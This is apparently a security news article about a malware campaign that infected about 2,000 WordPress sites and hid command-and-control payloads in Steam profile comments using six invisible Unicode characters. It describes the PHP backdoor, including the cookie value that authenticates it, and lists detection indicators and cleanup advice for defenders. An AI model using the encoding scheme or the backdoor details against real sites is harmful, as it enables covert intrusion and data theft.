WordPress Malware Hides C2 Payloads in Steam Profile Comments

Nearly 2,000 WordPress websites have been infected with malware that conceals its command-and-control infrastructure inside Steam Community profile comments, using invisible Unicode characters to hide malicious payloads in plain sight.

GoDaddy security engineers discovered the campaign while tracking WordPress infections since July 2025. The technique exploits the difficulty of detecting hidden characters within user-generated content on legitimate platforms—in this case, Valve's Steam gaming community.

How the Attack Works

The infection operates in three stages. First, malicious code planted on a WordPress site monitors page loads for instructions to fetch specific Steam profile URLs. The malware then retrieves comments from those profiles and extracts text that appears innocent to human readers but contains hidden instructions.

The payloads are encoded using six invisible Unicode characters:

• Zero-width non-joiner (U+200C)
• Zero-width joiner (U+200D)
• Function application (U+2061)
• Invisible times (U+2062)
• Invisible separator (U+2063)
• Invisible plus (U+2064)

As GoDaddy researchers explained, this encoding embeds binary data within normal-looking text. A Steam comment might read "great profile!" while actually containing encoded URLs for malicious JavaScript libraries. The visible text serves as camouflage while the invisible characters carry the actual instructions.

Backdoor Capabilities

The final stage deploys a PHP backdoor that accepts specially crafted POST requests. Attackers authenticate using a specific cookie value ("tEcaKKXEsb"), then pass base64-encoded PHP code for execution. This gives operators full control over infected sites—they can modify content, steal data, or pivot to attack site visitors.

The technique bears similarity to other WordPress campaigns we've covered, but the Steam-based C2 channel represents a novel evasion method. By hosting instructions on a legitimate platform, attackers avoid the usual red flags that come with dedicated malicious infrastructure.

Detection Indicators

Security teams monitoring WordPress environments should watch for:

1. Outbound connections to Steam Community URLs from web servers
2. External JavaScript injections referencing unfamiliar domains
3. References to hello-mywordl[.]info in site code
4. Suspicious cache entries combined with disabled SSL verification
5. Invisible Unicode characters in any imported or injected code

The initial infection vector remains unclear, but researchers assess it likely involves stolen administrative credentials, compromised FTP/SFTP access, vulnerable plugins or themes, or upstream supply chain compromises.

WordPress Security Recommendations

Site administrators should audit their installations for signs of infection. Beyond checking for the specific indicators above:

1. Review all installed plugins and themes for unauthorized modifications
2. Check user accounts for any unexpected administrators
3. Examine recently modified files using find commands with modification time filters
4. Scan JavaScript files for obfuscated or minified code that doesn't match original sources

Organizations running multiple WordPress sites should consider centralized security monitoring. The campaign's scale suggests attackers are operating efficiently across thousands of targets.

For those unfamiliar with WordPress security fundamentals, our malware defense guide covers the basics of how these infections spread and persist.

Why This Matters

The Steam-based C2 technique highlights a growing trend: attackers embedding malicious infrastructure within legitimate services to evade detection. Security tools that rely on domain reputation or blocklists won't flag traffic to steampowered.com. The malicious payload only becomes visible when you examine the specific content being retrieved—and even then, the Unicode encoding makes it difficult to spot.

This represents a broader challenge for web security. User-generated content platforms provide enormous attack surface for hiding malicious payloads. Attackers have previously used Telegram, Discord, and various paste sites for similar purposes. Steam profiles are just the latest example.

The invisible Unicode technique could be replicated across many platforms. Any service that allows user comments and doesn't strip invisible characters is a potential C2 channel. Defenders should consider this capability when assessing traffic to legitimate platforms—the domain being trusted doesn't mean the content is safe.

GoDaddy continues to track the campaign and has reported the malicious Steam profiles to Valve. Site owners who discover infections should assume credentials have been compromised and rotate all authentication material after cleaning the malware.